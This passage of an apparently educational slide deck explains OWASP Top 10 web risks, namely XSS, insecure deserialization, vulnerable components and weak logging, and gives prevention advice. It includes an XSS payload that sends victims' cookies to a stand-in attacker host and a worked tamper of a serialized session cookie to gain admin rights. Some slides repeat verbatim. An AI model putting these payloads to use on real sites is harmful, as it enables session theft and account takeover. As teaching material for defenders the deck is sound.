Stored XSS and DOM XSS. It
is so common that there are
freely available exploitation
frameworks.
Security Weaknesses.
XSS is the second most
prevalent issue in the OWASP
Top 10, and is found in
around two thirds of all
applications. Automated
tools can find some XSS
problems automatically,
particularly in mature
technologies such as PHP,
J2EE / JSP, and ASP.NET.
Impacts.
The impact of XSS is
moderate for reflected and
DOM XSS, and severe for
stored XSS, with remote code
execution on the victim’s
browser, such as stealing
credentials, sessions, or
delivering malware to the
victim.
CROSS-SITE SCRIPTING
73. Possible Vulnerabilities
• Stored XSS (Persistent or Type I): When user input is stored on
the server, such as in a DB, in a message forum, or visitor log, And
then a victim is able to retrieve the stored data from the web app.
without that data being made safe to render.
• Reflected XSS (Non-Persistent or Type II): When user input is
immediately returned by a web app. in an error message, or
search result, without that data being made safe to render.
• DOM Based XSS (Type-0): The attack payload is executed as a
result of modifying the DOM “environment” in the victim’s
browser used by the original client side script, so that the client
side code runs in an “unexpected” manner. That is, the page itself
(the HTTP response that is) does not change, but the client side
code contained in the page executes differently due to the
malicious modifications that have occurred in the DOM
environment.
CROSS-SITE SCRIPTING
74. Attack Scenarios
#1 Using Untrusted Data
CROSS-SITE SCRIPTING
The attacker modifies the ‘CC’ parameter in the browser to:
'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
75. Attack Scenarios
#2 Defeat Any CSRF Defense
CROSS-SITE SCRIPTING
From the previous scenario, lets assume that the attacker can get the user session ID
rom the cookies and want to take control over the account.
To perform the request to the server we need a CSRF token, which is a token
regenerated with each response, that is usually saved in a meta tag.
Anatomy of Attack
In a successful CSRF attack, the attacker causes the victim user
to carry out an action unintentionally. For example, this might
be to change the email address on their account, to change
their password, or to make a funds transfer. Depending on the
nature of the action
76. CROSS-SITE SCRIPTING
How to Prevent
• Using frameworks that automatically escape XSS by
design, Learn the limitations of each framework’s XSS
protection and appropriately handle the use cases
which are not covered.
• Escaping untrusted HTTP request data based on the
context in the HTML output (body, attribute, JavaScript,
CSS, or URL) will resolve Reflected and Stored XSS
vulnerabilities.
• Enabling a Content Security Policy (CSP) as a defense-
in-depth mitigating control against XSS.
77. Insecure Deserialization
Insecure Deserialization is a vulnerability which occurs when untrusted data is used to abuse the
logic of an application, inflict a denial of service (DoS) attack, or even execute arbitrary code
upon it being deserialized.
INSECURE DESERIALIZATION
Injection
Broken Authentication
Sensitive Data Exposure
XXE
Broken Access Control
Security Misconfiguration
XSS
Insecure Deserialization
Vulnerable Components
Insufficient Logging and
Monitoring
0 0.5 1 1.5 2 2.5 3 3.5
Technical
Detectability
Prevalence
Exploitability
Insecure Deserialization Rating
Insecure Deserialization
78. Attack Vectors.
Exploitation of deserialization
is somewhat difficult, as off
the shelf exploits rarely work
without changes or tweaks to
the underlying exploit code.
Security Weaknesses.
Some tools can discover
deserialization flaws, but
human assistance is
frequently needed to validate
the problem..
Impacts.
The impact of deserialization
flaws cannot be overstated.
These flaws can lead to
remote code execution
attacks, one of the most
serious attacks possible.
INSECURE DESERIALIZATION
79. Attack Vectors.
Exploitation of deserialization
is somewhat difficult, as off
the shelf exploits rarely work
without changes or tweaks to
the underlying exploit code.
Security Weaknesses.
Some tools can discover
deserialization flaws, but
human assistance is
frequently needed to validate
the problem..
Impacts.
The impact of deserialization
flaws cannot be overstated.
These flaws can lead to
remote code execution
attacks, one of the most
serious attacks possible.
INSECURE DESERIALIZATION
80. Attack Vectors.
Exploitation of deserialization
is somewhat difficult, as off
the shelf exploits rarely work
without changes or tweaks to
the underlying exploit code.
Security Weaknesses.
Some tools can discover
deserialization flaws, but
human assistance is
frequently needed to validate
the problem..
Impacts.
The impact of deserialization
flaws cannot be overstated.
These flaws can lead to
remote code execution
attacks, one of the most
serious attacks possible.
INSECURE DESERIALIZATION
81. Serialization
refers to a process of converting an object into a format
which can be persisted to disk (for example saved to a file or
a datastore), sent through streams (for example stdout), or
sent over a network. The format in which an object is
serialized into, can either be binary or structured text (for
example XML, JSON YAML…). JSON and XML are two of the
most commonly used serialization formats within web
applications.
INSECURE DESERIALIZATION
82. Attack Scenario
#1 Escalating Privileges
1. After logging in, session information is kept in a base64 encoded cookie
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjoxO30=
2. When the attacker decode this value, it turns to be an object of class User
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}
3. Now the last field is a boolean value that can be manipulated
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}
4. Decode the serialized object again and set the session cookie to the new value.
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjoxO30K
And the account gained admin privileges
Anatomy of Attack
An example of broken access control exploiting a variable
manipulation, where the goal is to acquire administrator
privileges, after logging in with the credentials of normal user
INSECURE DESERIALIZATION
83. • Implementing integrity checks such as digital
signatures on any serialized objects. This is done by
encrypting the serialized object with private key. Any
manipulation to the object will result in a different hash
value.
• Enforcing strict type constraints during deserialization
before object creation as the code typically expects a
definable set of classes.
• Isolating and running code that deserializes in low
privilege environments when possible.
• Log deserialization exceptions and failures, such as
where the incoming type is not the expected type, or
the deserialization throws exceptions.
INSECURE DESERIALIZATION
How to Prevent
84. Using Components with Known
Vulnerabilities
There are new cyber vulnerabilities and threats emerging each day putting the users at risk but
not all of those are zero-days. Most of those threats occur due to the software dependencies
like using components such as libraries and frameworks which are previously known to be
vulnerable
VULNERABLE COMPONENTS
Injection
Broken Authentication
Sensitive Data Exposure
XXE
Broken Access Control
Security Misconfiguration
XSS
Insecure Deserialization
Vulnerable Components
Insufficient Logging and
Monitoring
0 0.5 1 1.5 2 2.5 3 3.5
Technical
Detectability
Prevalence
Exploitability
Using Components with Known Vulnerabilities Rating
Vulnerable Components
85. If you do not know the
versions of all components
you use. Either you directly
use or nested dependencies.
If software is vulnerable,
unsupported, or out of
date. This includes the OS,
web/application, server
and DBMS
If you do not scan for
vulnerabilities regularly and
subscribe to security
bulletins related to the
components you use.
If you do not fix or upgrade
the underlying platform,
frameworks, and
dependencies in a risk-based
If software developers do
not test the compatibility
of updated, upgraded, or
patched libraries.
If you do not secure the
components’
configurations
Possible Vulnerabilities
VULNERABLE COMPONENTS
86. If you do not know the
versions of all components
you use. Either you directly
use or nested dependencies.
If software is vulnerable,
unsupported, or out of date.
This includes the OS,
web/application, server and
DBMS
If you do not scan for
vulnerabilities regularly and
subscribe to security
bulletins related to the
components you use.
If you do not fix or upgrade
the underlying platform,
frameworks, and
dependencies in a risk-based
If software developers do
not test the compatibility
of updated, upgraded, or
patched libraries.
If you do not secure the
components’
configurations
Possible Vulnerabilities
VULNERABLE COMPONENTS
87. If you do not know the
versions of all components
you use. Either you directly
use or nested dependencies.
If software is vulnerable,
unsupported, or out of date.
This includes the OS,
web/application, server and
DBMS
If you do not scan for
vulnerabilities regularly and
subscribe to security
bulletins related to the
components you use.
If you do not fix or upgrade
the underlying platform,
frameworks, and
dependencies in a risk-based
If software developers do
not test the compatibility
of updated, upgraded, or
patched libraries.
If you do not secure the
components’
configurations
Possible Vulnerabilities
VULNERABLE COMPONENTS
88. If you do not know the
versions of all components
you use. Either you directly
use or nested dependencies.
If software is vulnerable,
unsupported, or out of date.
This includes the OS,
web/application, server and
DBMS
If you do not scan for
vulnerabilities regularly and
subscribe to security
bulletins related to the
components you use.
If you do not fix or upgrade
the underlying platform,
frameworks, and
dependencies in a risk-based
If software developers do
not test the compatibility
of updated, upgraded, or
patched libraries.
If you do not secure the
components’
configurations
Possible Vulnerabilities
VULNERABLE COMPONENTS
89. If you do not know the
versions of all components
you use. Either you directly
use or nested dependencies.
If software is vulnerable,
unsupported, or out of date.
This includes the OS,
web/application, server and
DBMS
If you do not scan for
vulnerabilities regularly and
subscribe to security
bulletins related to the
components you use.
If you do not fix or upgrade
the underlying platform,
frameworks, and
dependencies in a risk-based
If software developers do
not test the compatibility
of updated, upgraded, or
patched libraries.
If you do not secure the
components’
configurations
Possible Vulnerabilities
VULNERABLE COMPONENTS
90. If you do not know the
versions of all components
you use. Either you directly
use or nested dependencies.
If software is vulnerable,
unsupported, or out of date.
This includes the OS,
web/application, server and
DBMS
If you do not scan for
vulnerabilities regularly and
subscribe to security
bulletins related to the
components you use.
If you do not fix or upgrade
the underlying platform,
frameworks, and
dependencies in a risk-based
If software developers do
not test the compatibility
of updated, upgraded, or
patched libraries.
If you do not secure the
components’
configurations
Possible Vulnerabilities
VULNERABLE COMPONENTS
91. Insufficient Logging and
Monitoring
Exploitation of insufficient logging and monitoring is the bedrock of nearly every major incident.
Attackers rely on the lack of monitoring and timely response to achieve their goals without
being detected.
INSUFFICIENT LOGGING
Injection
Broken Authentication
Sensitive Data Exposure
XXE
Broken Access Control
Security Misconfiguration
XSS
Insecure Deserialization
Vulnerable Components
Insufficient Logging and
Monitoring
0 0.5 1 1.5 2 2.5 3 3.5
Technical
Detectability
Prevalence
Exploitability
Insufficient Logging and Monitoring Rating
Insufficient Logging and Monitoring
92. • Auditable events, such as logins, failed logins, and high-
value transactions are not logged.
• Warnings and errors generate no, inadequate, or unclear
log messages.
• Logs of applications and APIs are not monitored for
suspicious activity.
• Logs are only stored locally.
• Appropriate alerting thresholds and response escalation
processes are not in place or effective.
• Penetration testing and scans by do not trigger alerts.
• The application is unable to detect, escalate, or alert for
active attacks in real time or near real time.
Possible Vulnerabilities
INSUFFICIENT LOGGING
93. If you put a key under the mat for the
cops, a burglar can find it, too.
Criminals are using every technology
tool at their disposal to hack into
people’s accounts. If they know there’s
a key hidden somewhere, they won’t
stop until they find it.
“
94. More Resources
Collaboratively administrate empowered
markets via plug-and-play networks.
• OWASP Top 10 (2017)
• Real-life Examples of Web Vulnerabilities
(OWASP Top 10)
• OWASP Attacks List
• How to Prevent SQL Injection in PHP
• OWASP Cheat Sheet Series
• Digital Identity Guidelines: Authentication and
Life Cycle Management
• Ponemon Institute Cost of a Data Breach 2020
• The 15 Biggest Data Breaches of 21st Century
• Hashing Algorithms and Security
• OWASP Security Headers Project
• Content Security Policy
• How Your Laravel Application Can Be Hacked
• Digital Signature Overview